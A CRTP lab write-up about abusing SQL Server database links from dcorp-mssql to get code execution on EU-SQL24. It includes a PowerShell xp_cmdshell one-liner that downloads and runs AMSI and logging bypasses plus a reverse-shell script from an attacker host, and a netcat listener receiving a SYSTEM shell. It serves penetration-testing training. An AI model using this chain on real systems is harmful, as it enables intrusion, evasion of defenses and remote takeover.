# CRTP Lab 22

## Task

Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorpmssql.

First, enumerate SQL servers in the domain and if student has privileges to connect to any of them. Run Invishell and use PowerUpSQL to enumerate.

{% code overflow="wrap" %}

```
PS C:\Users\student372> Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.psd1

# Look for SPNs that start with MSSQL*
PS C:\Users\student372> Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
```

{% endcode %}

Since we can connect to dcorp-mssql, we can use Get-SQLServerLinkCrawl to crawl the database links automatically.

{% code overflow="wrap" %}

```
PS C:\Users\student372> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose


VERBOSE:  Server: EU-SQL24
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL24.EU.EUROCORP.LOCAL
VERBOSE:  - Link Login: sa
VERBOSE:  - Link IsSysAdmin: 1
VERBOSE:  - Link Count: 0
VERBOSE:  - Links on this server:
```

{% endcode %}

We have sysadmin on EU-SQL24 server. 

If xp\_cmdshell is enabled, it is possible to execute commands on EU-SQL24. 

To avoid dealing with a large number of quotes and escapes, use the following command:

{% code overflow="wrap" %}

```
Get-SQLServerLinkCrawl -Instance dcorpmssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'set username'"
```

{% endcode %}

To get a reverse shell, we'll use Invoke-PowerShellTcpEx.ps1

Create a copy of Invoke-PowerShellTcpEx.ps1 and rename it to Invoke-PowerShellTcpEx1.ps1. 

Add "Power -Reverse -IPAddress 172.16.100.X -Port 443" (without quotes) to the end of the file.

Host the files on attacker HTTP server. Start a listener using netcat.

{% code overflow="wrap" %}

```
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.72/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql24
```

{% endcode %}

On Listener:

{% code overflow="wrap" %}

```
C:\Users\student372>cd C:\AD\Tools\netcat-win32-1.12\

C:\AD\Tools\netcat-win32-1.12>nc64.exe -lvnp 443
listening on [any] 443 ...
connect to [172.16.100.72] from (UNKNOWN) [172.16.15.17] 56942
Windows PowerShell running as user SYSTEM on EU-SQL24
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>

```

{% endcode %}